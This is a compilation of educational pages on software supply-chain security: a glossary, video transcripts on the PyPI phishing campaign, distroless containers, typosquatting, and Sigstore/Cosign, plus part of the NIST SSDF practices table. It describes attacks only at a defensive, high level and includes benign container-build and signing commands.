SBOM An acronym, SBOM stands for software bill of materials (plural: SBOMs or software bills of materials). An SBOM is like an electronic packing slip or receipt: it is a formal record that contains the details and supply chain relationships (such as dependencies) of the components used in building a given piece of software. Sigstore A suite of tools to sign, verify, and monitor software artifacts. Within the umbrella of Sigstore are Cosign for artifact signing and verification, the certificate authority Fulcio, and the transparency log Rekor. Each of these tools can also be used independently of the others. SLSA Standing for Supply chain Levels for Software Artifacts, SLSA (pronounced "salsa") is a security framework that offers a checklist of standards and controls in order to prevent tampering, improve integrity, and secure packages and infrastructure. SLSA has a build track with three levels of increasing security. SSDF A project of the United States Department of Commerce's National Institute of Standards and Technology (NIST), the Secure Software Development Framework (SSDF) is a set of guidelines and recommendations for establishing a secure software development practice. Tekton Tekton provides a cloud-native solution for building CI/CD systems with a focus on software supply chain security, offering artifact signatures and attestations through Tekton Chains. TUF The Update Framework, known as TUF, offers a framework for securing software update systems. Attacks and vulnerabilities Codecov Hack An example of a software supply chain attack that took place in early 2021. The code coverage tool Codecov experienced a sophisticated attack in which its Bash uploader script was modified by a malicious actor. The affected script allowed the attacker to extract customer credentials passing through Codecov's continuous integration (CI) platform, exposing services accessible with these credentials to further exploitation. Log4Shell An internet vulnerability involving a nearly ubiquitous piece of software, Log4j. The vulnerability received attention in December 2021 and much work was done to mitigate it; the vulnerability can be exploited to achieve remote code execution. SolarWinds Hack The commonly used term for the software supply chain breach that involved the SolarWinds Orion system, which occurred in 2020. Hackers gained access to the networks, systems, and data of thousands of SolarWinds customers, putting at risk the more than 30,000 organizations that relied on the Orion software. This was one of the largest software supply chain attacks of its kind recorded to date. Typosquatting Typosquatting is a cyber attack in which adversaries try to pass off a string (such as a URL) that they own as something official. For example, instead of the official chainguard.dev, an adversary may register chain-guard.dev, cha1nguard.dev, or chainguar.dev in order to pretend to be the official site. --- ### WTF happened with the PyPI phishing attack? URL: https://edu.chainguard.dev/software-security/videos/pypi/ Last Modified: August 1, 2022 On 8/24/22, PyPI, an open source repository of software for the Python programming language, announced an active phishing campaign targeting PyPI users. How did it happen and how can we prevent future attacks?
Let's recap: Before we cover the phishing attack, it's worthwhile to mention that on July eighth, PyPI announced it would require the implementation of two-factor authentication (2FA) for projects deemed critical — that is, any project in the top 1% of downloads over the past six months. This is a huge step forward for open source security, and as of August twenty-fourth, nearly 30,000 PyPI maintainers have 2FA enabled. About a month and a half later, on August twenty-fourth, PyPI tweeted that they had reports of phishing: fake emails that appeared to be from PyPI, requiring a mandatory validation process and leading users to a fake login page. When users went to enter their credentials, the credentials were stolen. Legitimate projects have been compromised, and malware published as the latest release for those projects. PyPI has already taken down several hundred typosquats of the malicious releases. It's important to note that accounts protected by hardware security keys, the strongest form of 2FA, are not vulnerable. It is currently unclear if time-based one-time passwords (for example, a one-time-use SMS PIN) were affected. What happens now? PyPI is actively reviewing reports of new malicious releases, and ensuring that they are removed and the maintainer accounts restored. They also recommend resetting your password and 2FA recovery codes if you entered your credentials on the phishing site. This attack highlights the importance of MFA, especially hardware or WebAuthn 2FA. Hardware keys are not vulnerable to these types of attacks because, in order to authenticate with one, you physically have to have the key, which makes it impossible for attackers to get the information they need to log in from afar. [Dan to show a Yubikey]. PyPI is run largely by volunteer maintainers who are working to make the open source ecosystem more secure. Having checks in place that may require a small amount of time for individual maintainers to set up can have an outsized impact on the overall wellness of the software supply chain. If you haven't already, enable 2FA at https://pypi.org/2fa/ and shout out to the PyPI team for their transparency and their continued efforts toward keeping open source more secure! --- ### WTF is a distroless container? URL: https://edu.chainguard.dev/software-security/videos/distroless/ Last Modified: August 1, 2022 Have you heard of distroless container images? This video is going to break down what they are, how they work, and why they're better. The easiest way to explain what a distroless container image is and how it differs from a traditional fat container image is to start with the fat container image; then we'll point out the parts that aren't necessary and show how distroless images let you build smaller, leaner, more secure container images. In a traditional fat container image like the one shown in the video, we have a bunch of different stuff installed. We start out with a package manager that we typically use to install a bunch of dependencies, and then all the way on the other side we have our application. The dependencies that we install with the package manager might be needed to build our application or to operate it at runtime. Additionally, the package manager itself is an application, and it comes with its own set of dependencies, which we can see here. Some of those dependencies are used for our application because they might be shared or used for a bunch of different things, but some of those dependencies are only used for the package manager.
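To make the build-time versus runtime distinction concrete, here is a minimal multi-stage Dockerfile sketch. The base images and the Go application are illustrative assumptions rather than anything from the video: the first stage has the compiler and full package ecosystem available for building, while the final stage is a distroless base that ships only the compiled application.

```Dockerfile
# Build stage: includes the compiler, package manager, and other build-time tools.
FROM golang:1.22 AS build
WORKDIR /src
COPY . .
RUN CGO_ENABLED=0 go build -o /app .

# Runtime stage: a distroless base, so only the application is shipped;
# the build tools, package manager, and their dependencies stay behind.
FROM gcr.io/distroless/static-debian12
COPY --from=build /app /app
ENTRYPOINT ["/app"]
```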
All of those build tools and the package manager dependencies are left in the container image at the end, making it larger, taking up space, and potentially introducing an increased attack surface. The package manager itself and all of its dependencies and build tools aren't actually needed at runtime to operate our application, so a distroless container image works by stripping all of those out so that the only thing left in the image at runtime is your application and the exact dependencies that it needs. You don't have the build tools, the compilers, the package manager, or its dependencies. A fun metaphor or comparison is this massive ship here, full of giant containers and cranes used to load all of them. This is like a typical fat container image. Distroless images are so slim, you can hold them in your hand. This also makes them a lot more transparent and makes it easier to see what's inside of them. Another metaphor here is this massive ship that has a crane on the ship itself. Sure, that crane is useful for loading and unloading the packages once you get to the ports, but it's much more efficient to leave the cranes at those ports so you can have smaller ships. A distroless analogy would be the small ships here, holding exactly one container each. There's no extra or wasted space, and there's no crane to load or unload them; you have to do that from the outside before you go on your journey. To figure out how they work, let's again start with the traditional fat container image. These images are built up in layers. You start with a base image that contains the package manager, a shell, and other tools you might need to get your application inside. Then you add on layers, one at a time. These layers can only really add things: they can add compiled executables or new packages. You can't remove things from previous layers. --- ### WTF is a Typo Squatting Attack? URL: https://edu.chainguard.dev/software-security/videos/github-typosquatting/ Last Modified: August 1, 2022 Hi, I'm Dan Lorenc, CEO & Co-founder of Chainguard, and I've been working in the open source software supply chain security space for a long time. Today, we're going to recap the massive typosquatting attack that was carried out against a bunch of open source projects on GitHub on August 3, 2022. Typosquatting is a type of attack where an attacker subtly changes the name of a real project to make it look like that project, even though it's not actually the same repository or package. It is really hard to detect because there are a lot of subtle ways to do it: you can change underscores to hyphens, mess around with Unicode characters, or use plurals, just to name a few. On August 3, a tweet went viral about over 35,000 fake repositories created by cloning real projects (things like Kubernetes, cryptography libraries, and programming languages), all designed with very similar names. This got a little bit oversensationalized because of the scale of the attack until everyone found out what really happened. Fortunately, this was caught early, so no malicious commits were actually found in real projects; that's where a lot of the confusion came from. Malicious code only slipped into these imposter repositories. Typically, there's a second phase of these attacks where developers may unknowingly use the malicious fake repository's code, thinking it was the real one, thus compromising their project. Thankfully, though, this one was caught in the middle, so nothing bad actually happened.
But we don't know how bad this one really could have been if it hadn't been noticed and had played out for longer. This attack was the largest and most advanced I've seen so far. The scale of over 35,000 repositories showed some clear automation. The malicious commands were slipped in and hidden inside of real ones, and they were all semantically correct, too. So it'd be tough to catch if you were just casually looking around. So what can you do to protect yourself against stuff like this? There are a couple of different ways. As an end user, pay very close attention to your dependencies; it's going to be hard to notice typosquatting attacks like this, but these are all very recently created repositories with very few stars and little activity. As a maintainer, to prevent someone from creating an imposter repository, the only protection really available today is to sign your commits. There's a bunch of different tooling to do this, including a new one called Gitsign, which is part of the Sigstore project. None of these are perfect or solve the problem completely. But if you pay enough attention, and if enough people start signing their commits, it will be easier for us to detect these across the open source ecosystem at scale. --- ### WTF is Sigstore? URL: https://edu.chainguard.dev/software-security/videos/sigstore/ Last Modified: August 1, 2022 Let's talk about software supply chain security. Vulnerabilities and attacks in software have been increasing in recent years, and the U.S. House of Representatives recently passed a bill that would forbid the Department of Defense (DoD) from procuring any software applications that contain a single security vulnerability, or CVE (short for Common Vulnerabilities and Exposures). Attacks and other security issues can exist all across the software supply chain, from the dependencies or packages you leverage in your code, to the code you write, to your deployment and integration strategy, to your packaging. With so many opportunities for attack vectors and vulnerability risks, what can software developers do? Luckily there is an open source solution that can help with mitigating some of these security concerns. It's called Sigstore, and it offers a suite of tools that provides a new standard for signing, verifying, and protecting software. Sigstore handles the digital signing, verification, and provenance checks needed to make it safer to distribute and use open source software. So what does that all mean? Let's use a real-life example: If you're going to a concert that has an age restriction, or you want to open a new bank account, someone is going to ask you for your ID. Neither the concert venue nor the bank issued you this ID; a national or local governmental body probably did. But your ID still attests to your identity, and the venue or bank will accept this ID as proof of your identity because of the trust root that exists with the ID-issuing authority. In the case of the bank account, once you open it, your bank account number will become part of a database or log that is connected to your identity. This is similar to how Sigstore works, bringing identity (your ID), a certificate authority (the governmental body that issued your ID), and a transparency log (the bank's account database) together to enable verification and trust to exist at each step of the software supply chain. We'll break down how this happens with each part of the Sigstore project (Cosign, Rekor, Fulcio, and Gitsign) in upcoming videos, so follow for more!
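For a concrete preview of how that identity, certificate authority, and transparency log come together in practice, here is a rough sketch of Cosign's keyless flow on the command line. The image reference and email address are placeholders, and flags can vary between Cosign versions, so treat this as illustrative rather than canonical.

```sh
# Sign an image "keylessly": Cosign walks you through an OIDC login
# (e.g., Google, GitHub, or Microsoft), obtains a short-lived certificate
# from the Fulcio certificate authority, and records the signature in the
# Rekor transparency log.
cosign sign --yes registry.example.com/myapp@sha256:<digest>

# Anyone can later verify the signature against the expected identity and issuer.
cosign verify \
  --certificate-identity you@example.com \
  --certificate-oidc-issuer https://accounts.google.com \
  registry.example.com/myapp@sha256:<digest>
```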
Cosign Cosign is a tool that helps make software more secure. Part of the Sigstore project, Cosign supports container signing, verification, and storage in an OCI (Open Container Initiative) registry. Cosign makes it so that code signatures can be a part of invisible infrastructure. If we think about something physical that we want to keep secure, we may think of keys and a lock. Cosign lets developers generate a key pair with a private signing key that only you have access to, and a public verification key that can be stored with the software or in a transparency log. The signature produced with the private key is attached to the software artifact when it is released (whether that's as a package, binary, container, or whatever). Once that software is out in the world, another developer or user can verify the claims of the signature by checking them against the public key. We can also think of Cosign as being like a wax seal on old paper letters. When someone — say a queen or public official — wrote a letter that needed to be secured, they would close up the letter and drip wax on it, then stamp into it with their seal or emblem. This would let the person who receives the letter know that the letter is from whom it claims to be from, and also that the letter wasn't tampered with; if it had been, the recipient would know because the wax seal would be broken. Another neat thing about Sigstore is that it enables keyless signing, meaning you don't need to generate a key pair but can instead use the OIDC (OpenID Connect) protocol to authenticate your identity. This can currently be done through Google, GitHub, or Microsoft, and it will tie your identity — based on an email address or username — to the code you are signing. We'll go into the rest of the Sigstore suite soon — including certificates, transparency logs, and signing Git commits — so follow for more! --- ### Secure Software Development Framework (SSDF) Table, NIST SP 800-218 URL: https://edu.chainguard.dev/software-security/secure-software-development/ssdf/ Last Modified: May 10, 2023 Tags: Reference SSDF Table (columns: Practices, Tasks, Notional Implementation Examples, References) Define Security Requirements for Software Development (PO.1): Ensure that security requirements for software development are known at all times so that they can be taken into account throughout the SDLC and duplication of effort can be minimized because the requirements information can be collected once and shared. This includes requirements from internal sources (e.g., the organization's policies, business objectives, and risk management strategy) and external sources (e.g., applicable laws and regulations). PO.1.1: Identify and document all security requirements for the organization's software development infrastructures and processes, and maintain the requirements over time. Example 1: Define policies for securing software development infrastructures and their components, including development endpoints, throughout the SDLC and maintaining that security. Example 2: Define policies for securing software development processes throughout the SDLC and maintaining that security, including for open-source and other third-party software components utilized by software being developed. Example 3: Review and update security requirements at least annually, or sooner if there are new requirements from internal or external sources, or a major security incident targeting software development infrastructure has occurred. Example 4: Educate affected individuals on impending changes to requirements.
BSAFSS: SM.3, DE.1, IA.1, IA.2BSIMM: CP1.1, CP1.3, SR1.1, SR2.2, SE1.2, SE2.6EO14028: 4e(ix)IEC62443: SM-7, SM-9NISTCSF: ID.GV-3OWASPASVS: 1.1.1OWASPMASVS: 1.10OWASPSAMM: PC1-A, PC1-B, PC2-APCISSLC: 2.1, 2.2SCFPSSD: Planning the Implementation and Deployment of Secure Development PracticesSP80053: SA-1, SA-8, SA-15, SR-3SP800160: 3.1.2, 3.2.1, 3.2.2, 3.3.1, 3.4.2, 3.4.3SP800161: SA-1, SA-8, SA-15, SR-3SP800181: T0414; K0003, K0039, K0044, K0157, K0168, K0177, K0211, K0260, K0261, K0262, K0524; S0010, S0357, S0368; A0033, A0123, A0151 PO.1.2: Identify and document all security requirements for organization-developed software to meet, and maintain the requirements over time. Example 1: Define policies that specify risk-based software architecture and design requirements, such as making code modular to facilitate code reuse and updates; isolating security components from other components during execution; avoiding undocumented commands and settings; and providing features that will aid software acquirers with the secure deployment, operation, and maintenance of the software.Example 2: Define policies that specify the security requirements for the organization’s software, and verify compliance at key points in the SDLC (e.g., classes of software flaws verified by gates, responses to vulnerabilities discovered in released software).Example 3: Analyze the risk of applicable technology stacks (e.g., languages, environments, deployment models), and recommend or require the use of stacks that will reduce risk compared to others.Example 4: Define policies that specify what needs to be archived for each software release (e.g., code, package files, third-party libraries, documentation, data inventory) and how long it needs to be retained based on the SDLC model, software end-of-life, and other factors.Example 5: Ensure that policies cover the entire software life cycle, including notifying users of the impending end of software support and the date of software end-of-life.Example 6: Review all security requirements at least annually, or sooner if there are new requirements from internal or external sources, a major vulnerability is discovered in released software, or a major security incident targeting organization-developed software has occurred.Example 7: Establish and follow processes for handling requirement exception requests, including periodic reviews of all approved exceptions. BSAFSS: SC.1-1, SC.2, PD.1-1, PD.1-2, PD.1-3, PD.2-2, SI, PA, CS, AA, LO, EEBSIMM: SM1.1, SM1.4, SM2.2, CP1.1, CP1.2, CP1.3, CP2.1, CP2.3, AM1.2, SFD1.1, SFD2.1, SFD3.2, SR1.1, SR1.3, SR2.2, SR3.3, SR3.4EO14028: 4e(ix)IEC62443: SR-3, SR-4, SR-5, SD-4ISO27034: 7.3.2MSSDL: 2, 5NISTCSF: ID.GV-3OWASPMASVS: 1.12OWASPSAMM: PC1-A, PC1-B, PC2-A, PC3-A, SR1-A, SR1-B, SR2-B, SA1-B, IR1-APCISSLC: 2.1, 2.2, 2.3, 3.3SCFPSSD: Establish Coding Standards and ConventionsSP80053: SA-8, SA-8(3), SA-15, SR-3SP800160: 3.1.2, 3.2.1, 3.3.1SP800161: SA-8, SA-15, SR-3SP800181: T0414; K0003, K0039, K0044, K0157, K0168, K0177, K0211, K0260, K0261, K0262, K0524; S0010, S0357, S0368; A0033, A0123, A0151 PO.1.3: Communicate requirements to all third parties who will provide commercial software components to the organization for reuse by the organization’s own software. 
[Formerly PW.3.1] Example 1: Define a core set of security requirements for software components, and include it in acquisition documents, software contracts, and other agreements with third parties.Example 2: Define security-related criteria for selecting software; the criteria can include the third party’s vulnerability disclosure program and product security incident response capabilities or the third party’s adherence to organization-defined practices.Example 3: Require third parties to attest that their software complies with the organization’s security requirements.Example 4: Require third parties to provide provenance data and integrity verification mechanisms for all components of their software.Example 5: Establish and follow processes to address risk when there are security requirements that third-party software components to be acquired do not meet; this should include periodic reviews of all approved exceptions to requirements. BSAFSS: SM.1, SM.2, SM.2-1, SM.2-4BSIMM: CP2.4, CP3.2, SR2.5, SR3.2EO14028: 4e(vi), 4e(ix)IDASOAR: 19, 21IEC62443: SM-9, SM-10MSSDL: 7NISTCSF: ID.SC-3OWASPSAMM: SR3-ASCAGILE: Tasks Requiring the Help of Security Experts 8SCFPSSD: Manage Security Risk Inherent in the Use of Third-Party ComponentsSCSIC: Vendor Sourcing Integrity ControlsSP80053: SA-4, SA-9, SA-10, SA-10(1), SA-15, SR-3, SR-4, SR-5SP800160: 3.1.1, 3.1.2SP800161: SA-4, SA-9, SA-9(1), SA-9(3), SA-10, SA-10(1), SA-15, SR-3, SR-4, SR-5SP800181: T0203, T0415; K0039; S0374; A0056, A0161 Implement Roles and Responsibilities (PO.2): Ensure that everyone inside and outside of the organization involved in the SDLC is prepared to perform their SDLC-related roles and responsibilities throughout the SDLC. PO.2.1: Create new roles and alter responsibilities for existing roles as needed to encompass all parts of the SDLC. Periodically review and maintain the defined roles and responsibilities, updating them as needed. Example 1: Define SDLC-related roles and responsibilities for all members of the software development team.Example 2: Integrate the security roles into the software development team.Example 3: Define roles and responsibilities for cybersecurity staff, security champions, project managers and leads, senior management, software developers, software testers, software assurance leads and staff, product owners, operations and platform engineers, and others involved in the SDLC.Example 4: Conduct an annual review of all roles and responsibilities.Example 5: Educate affected individuals on impending changes to roles and responsibilities, and confirm that the individuals understand the changes and agree to follow them.Example 6: Implement and use tools and processes to promote communication and engagement among individuals with SDLC-related roles and responsibilities, such as creating messaging channels for team discussions.Example 7: Designate a group of individuals or a team as the code owner for each project. BSAFSS: PD.2-1, PD.2-2BSIMM: SM1.1, SM2.3, SM2.7, CR1.7EO14028: 4e(ix)IEC62443: SM-2, SM-13NISTCSF: ID.AM-6, ID.GV-2PCISSLC: 1.2SCSIC: Vendor Software Development Integrity ControlsSP80053: SA-3SP800160: 3.2.1, 3.2.4, 3.3.1SP800161: SA-3SP800181: K0233 PO.2.2: Provide role-based training for all personnel with responsibilities that contribute to secure development. Periodically review personnel proficiency and role-based training, and update the training as needed. 
Example 1: Document the desired outcomes of training for each role.Example 2: Define the type of training or curriculum required to achieve the desired outcome for each role.Example 3: Create a training plan for each role.Example 4: Acquire or create training for each role; acquired training may need to be customized for the organization.Example 5: Measure outcome performance to identify areas where changes to training may be beneficial. BSAFSS: PD.2-2BSIMM: T1.1, T1.7, T1.8, T2.5, T2.8, T2.9, T3.1, T3.2, T3.4EO14028: 4e(ix)IEC62443: SM-4MSSDL: 1NISTCSF: PR.ATOWASPSAMM: EG1-A, EG2-APCISSLC: 1.3SCAGILE: Operational Security Tasks 14, 15; Tasks Requiring the Help of Security Experts 1SCFPSSD: Planning the Implementation and Deployment of Secure Development PracticesSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-8SP800160: 3.2.4, 3.2.6SP800161: SA-8SP800181: OV-TEA-001, OV-TEA-002; T0030, T0073, T0320; K0204, K0208, K0220, K0226, K0243, K0245, K0252; S0100, S0101; A0004, A0057 PO.2.3: Obtain upper management or authorizing official commitment to secure development, and convey that commitment to all with development-related roles and responsibilities. Example 1: Appoint a single leader or leadership team to be responsible for the entire secure software development process, including being accountable for releasing software to production and delegating responsibilities as appropriate.Example 2: Increase authorizing officials’ awareness of the risks of developing software without integrating security throughout the development life cycle and the risk mitigation provided by secure development practices.Example 3: Assist upper management in incorporating secure development support into their communications with personnel with development-related roles and responsibilities.Example 4: Educate all personnel with development-related roles and responsibilities on upper management’s commitment to secure development and the importance of secure development to the organization. BSIMM: SM1.3, SM2.7, CP2.5EO14028: 4e(ix)NISTCSF: ID.RM-1, ID.SC-1OWASPSAMM: SM1.APCISSLC: 1.1SP800181: T0001, T0004 Implement Supporting Toolchains (PO.3): Use automation to reduce human effort and improve the accuracy, reproducibility, usability, and comprehensiveness of security practices throughout the SDLC, as well as provide a way to document and demonstrate the use of these practices. Toolchains and tools may be used at different levels of the organization, such as organization-wide or project-specific, and may address a particular part of the SDLC, like a build pipeline. PO.3.1: Specify which tools or tool types must or should be included in each toolchain to mitigate identified risks, as well as how the toolchain components are to be integrated with each other. Example 1: Define categories of toolchains, and specify the mandatory tools or tool types to be used for each category.Example 2: Identify security tools to integrate into the developer toolchain.Example 3: Define what information is to be passed between tools and what data formats are to be used.Example 4: Evaluate tools’ signing capabilities to create immutable records/logs for auditability within the toolchain.Example 5: Use automated technology for toolchain management and orchestration. 
BSIMM: CR1.4, ST1.4, ST2.5, SE2.7CNCFSSCP: Securing Materials—Verification; Securing Build Pipelines—Verification, Automation, Secure Authentication/Access; Securing Artefacts—Verification; Securing Deployments—VerificationEO14028: 4e(iii), 4e(ix)MSSDL: 8OWASPSAMM: IR2-B, ST2-BSCAGILE: Tasks Requiring the Help of Security Experts 9SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013, K0178 PO.3.2: Follow recommended security practices to deploy, operate, and maintain tools and toolchains. Example 1: Evaluate, select, and acquire tools, and assess the security of each tool.Example 2: Integrate tools with other tools and existing software development processes and workflows.Example 3: Use code-based configuration for toolchains (e.g., pipelines-as-code, toolchains-as-code).Example 4: Implement the technologies and processes needed for reproducible builds.Example 5: Update, upgrade, or replace tools as needed to address tool vulnerabilities or add new tool capabilities.Example 6: Continuously monitor tools and tool logs for potential operational and security issues, including policy violations and anomalous behavior.Example 7: Regularly verify the integrity and check the provenance of each tool to identify potential problems.Example 8: See PW.6 regarding compiler, interpreter, and build tools.Example 9: See PO.5 regarding implementing and maintaining secure environments. BSAFSS: DE.2BSIMM: SR1.1, SR1.3, SR3.4CNCFSSCP: Securing Build Pipelines—Verification, Automation, Controlled Environments, Secure Authentication/Access; Securing Artefacts—Verification, Automation, Controlled Environments, Encryption; Securing Deployments—Verification, AutomationEO14028: 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7IR8397: 2.2OWASPASVS: 1.14.3, 1.14.4, 14.1, 14.2OWASPMASVS: 7.9OWASPSCVS: 3, 5SCAGILE: Tasks Requiring the Help of Security Experts 9SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013, K0178 PO.3.3: Configure tools to generate artifacts of their support of secure software development practices as defined by the organization. Example 1: Use existing tooling (e.g., workflow tracking, issue tracking, value stream mapping) to create an audit trail of the secure development-related actions that are performed for continuous improvement purposes.Example 2: Determine how often the collected information should be audited, and implement the necessary processes.Example 3: Establish and enforce security and retention policies for artifact data.Example 4: Assign responsibility for creating any needed artifacts that tools cannot generate. BSAFSS: PD.1-5BSIMM: SM1.4, SM3.4, SR1.3CNCFSSCP: Securing Build Pipelines—Verification, Automation, Controlled Environments; Securing Artefacts—VerificationEO14028: 4e(i)(F), 4e(ii), 4e(v), 4e(ix)IEC62443: SM-12, SI-2MSSDL: 8OWASPSAMM: PC3-BOWASPSCVS: 3.13, 3.14PCISSLC: 2.5SCAGILE: Tasks Requiring the Help of Security Experts 9SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: K0013; T0024 Define and Use Criteria for Software Security Checks (PO.4): Help ensure that the software resulting from the SDLC meets the organization’s expectations by defining and using criteria for checking the software’s security during development. PO.4.1: Define criteria for software security checks and track throughout the SDLC. 
Example 1: Ensure that the criteria adequately indicate how effectively security risk is being managed.Example 2: Define key performance indicators (KPIs), key risk indicators (KRIs), vulnerability severity scores, and other measures for software security.Example 3: Add software security criteria to existing checks (e.g., the Definition of Done in agile SDLC methodologies).Example 4: Review the artifacts generated as part of the software development workflow system to determine if they meet the criteria.Example 5: Record security check approvals, rejections, and exception requests as part of the workflow and tracking system.Example 6: Analyze collected data in the context of the security successes and failures of each development project, and use the results to improve the SDLC. BSAFSS: TV.2-1, TV.5-1BSIMM: SM1.4, SM2.1, SM2.2, SM2.6, SM3.3, CP2.2EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SI-1, SI-2, SVV-3ISO27034: 7.3.5MSSDL: 3OWASPSAMM: PC3-A, DR3-B, IR3-B, ST3-BPCISSLC: 3.3SP80053: SA-15, SA-15(1)SP800160: 3.2.1, 3.2.5, 3.3.1SP800161: SA-15, SA-15(1)SP800181: K0153, K0165 PO.4.2: Implement processes, mechanisms, etc. to gather and safeguard the necessary information in support of the criteria. Example 1: Use the toolchain to automatically gather information that informs security decision-making.Example 2: Deploy additional tools if needed to support the generation and collection of information supporting the criteria.Example 3: Automate decision-making processes utilizing the criteria, and periodically review these processes.Example 4: Only allow authorized personnel to access the gathered information, and prevent any alteration or deletion of the information. BSAFSS: PD.1-4, PD.1-5BSIMM: SM1.4, SM2.1, SM2.2, SM3.4EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SI-1, SVV-1, SVV-2, SVV-3, SVV-4OWASPSAMM: PC3-BPCISSLC: 2.5SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15, SA-15(1), SA-15(11)SP800160: 3.2.5, 3.3.7SP800161: SA-15, SA-15(1), SA-15(11)SP800181: T0349; K0153 Implement and Maintain Secure Environments for Software Development (PO.5): Ensure that all components of the environments for software development are strongly protected from internal and external threats to prevent compromises of the environments or the software being developed or maintained within them. Examples of environments for software development include development, build, test, and distribution environments. PO.5.1: Separate and protect each environment involved in software development. Example 1: Use multi-factor, risk-based authentication and conditional access for each environment.Example 2: Use network segmentation and access controls to separate the environments from each other and from production environments, and to separate components from each other within each non-production environment, in order to reduce attack surfaces and attackers’ lateral movement and privilege/access escalation.Example 3: Enforce authentication and tightly restrict connections entering and exiting each software development environment, including minimizing access to the internet to only what is necessary.Example 4: Minimize direct human access to toolchain systems, such as build services. 
Continuously monitor and audit all access attempts and all use of privileged access.Example 5: Minimize the use of production-environment software and services from non-production environments.Example 6: Regularly log, monitor, and audit trust relationships for authorization and access between the environments and between the components within each environment.Example 7: Continuously log and monitor operations and alerts across all components of the development environment to detect, respond, and recover from attempted and actual cyber incidents.Example 8: Configure security controls and other tools involved in separating and protecting the environments to generate artifacts for their activities.Example 9: Continuously monitor all software deployed in each environment for new vulnerabilities, and respond to vulnerabilities appropriately following a risk-based approach.Example 10: Configure and implement measures to secure the environments’ hosting infrastructures following a zero trust architecture. BSAFSS: DE.1, IA.1, IA.2CNCFSSCP: Securing Build Pipelines—Controlled EnvironmentsEO14028: 4e(i)(A), 4e(i)(B), 4e(i)(C), 4e(i)(D), 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7NISTCSF: PR.AC-5, PR.DS-7SCAGILE: Tasks Requiring the Help of Security Experts 11SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-3(1), SA-8, SA-15SP800161: SA-3, SA-8, SA-15SP800181: OM-NET-001, SP-SYS-001; T0019, T0023, T0144, T0160, T0262, T0438, T0484, T0485, T0553; K0001, K0005, K0007, K0033, K0049, K0056, K0061, K0071, K0104, K0112, K0179, K0326, K0487; S0007, S0084, S0121; A0048 PO.5.2: Secure and harden development endpoints (i.e., endpoints for software designers, developers, testers, builders, etc.) to perform development-related tasks using a risk-based approach. Example 1: Configure each development endpoint based on approved hardening guides, checklists, etc.; for example, enable FIPS-compliant encryption of all sensitive data at rest and in transit.Example 2: Configure each development endpoint and the development resources to provide the least functionality needed by users and services and to enforce the principle of least privilege.Example 3: Continuously monitor the security posture of all development endpoints, including monitoring and auditing all use of privileged access.Example 4: Configure security controls and other tools involved in securing and hardening development endpoints to generate artifacts for their activities.Example 5: Require multi-factor authentication for all access to development endpoints and development resources.Example 6: Provide dedicated development endpoints on non-production networks for performing all development-related tasks. Provide separate endpoints on production networks for all other tasks.Example 7: Configure each development endpoint following a zero trust architecture. 
BSAFSS: DE.1-1, IA.1, IA.2EO14028: 4e(i)(C), 4e(i)(E), 4e(i)(F), 4e(ii), 4e(iii), 4e(v), 4e(vi), 4e(ix)IEC62443: SM-7NISTCSF: PR.AC-4, PR.AC-7, PR.IP-1, PR.IP-3, PR.IP-12, PR.PT-1, PR.PT-3, DE.CMSCAGILE: Tasks Requiring the Help of Security Experts 11SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-15SP800161: SA-15SP800181: OM-ADM-001, SP-SYS-001; T0484, T0485, T0489, T0553; K0005, K0007, K0077, K0088, K0130, K0167, K0205, K0275; S0076, S0097, S0121, S0158; A0155 Protect All Forms of Code from Unauthorized Access and Tampering (PS.1): Help prevent unauthorized changes to code, both inadvertent and intentional, which could circumvent or negate the intended security characteristics of the software. For code that is not intended to be publicly accessible, this helps prevent theft of the software and may make it more difficult or time-consuming for attackers to find vulnerabilities in the software. PS.1.1: Store all forms of code – including source code, executable code, and configuration-as-code – based on the principle of least privilege so that only authorized personnel, tools, services, etc. have access. Example 1: Store all source code and configuration-as-code in a code repository, and restrict access to it based on the nature of the code. For example, open-source code intended for public access may need its integrity and availability protected; other code may also need its confidentiality protected.Example 2: Use version control features of the repository to track all changes made to the code with accountability to the individual account.Example 3: Use commit signing for code repositories.Example 4: Have the code owner review and approve all changes made to the code by others.Example 5: Use code signing to help protect the integrity of executables.Example 6: Use cryptography (e.g., cryptographic hashes) to help protect file integrity. BSAFSS: IA.1, IA.2, SM.4-1, DE.1-2BSIMM: SE2.4CNCFSSCP: Securing the Source Code—Verification, Automation, Controlled Environments, Secure Authentication; Securing Materials—AutomationEO14028: 4e(iii), 4e(iv), 4e(ix)IDASOAR: Fact Sheet 25IEC62443: SM-6, SM-7, SM-8NISTCSF: PR.AC-4, PR.DS-6, PR.IP-3OWASPASVS: 1.10, 10.3.2OWASPMASVS: 7.1OWASPSAMM: OE3-BPCISSLC: 5.1, 6.1SCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP80053: SA-10SP800161: SA-8, SA-10 Provide a Mechanism for Verifying Software Release Integrity (PS.2): Help software acquirers ensure that the software they acquire is legitimate and has not been tampered with. PS.2.1: Make software integrity verification information available to software acquirers. Example 1: Post cryptographic hashes for release files on a well-secured website.Example 2: Use an established certificate authority for code signing so that consumers’ operating systems or other tools and services can confirm the validity of signatures before use.Example 3: Periodically review the code signing processes, including certificate renewal, rotation, revocation, and protection. BSAFSS: SM.4, SM.5, SM.6BSIMM: SE2.4CNCFSSCP: Securing Deployments—VerificationEO14028: 4e(iii), 4e(ix), 4e(x)IEC62443: SM-6, SM-8, SUM-4NISTCSF: PR.DS-6NISTLABEL: 2.2.2.4OWASPSAMM: OE3-BOWASPSCVS: 4PCISSLC: 6.1, 6.2SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-8SP800161: SA-8SP800181: K0178 Archive and Protect Each Software Release (PS.3): Preserve software releases in order to help identify, analyze, and eliminate vulnerabilities discovered in the software after release. 
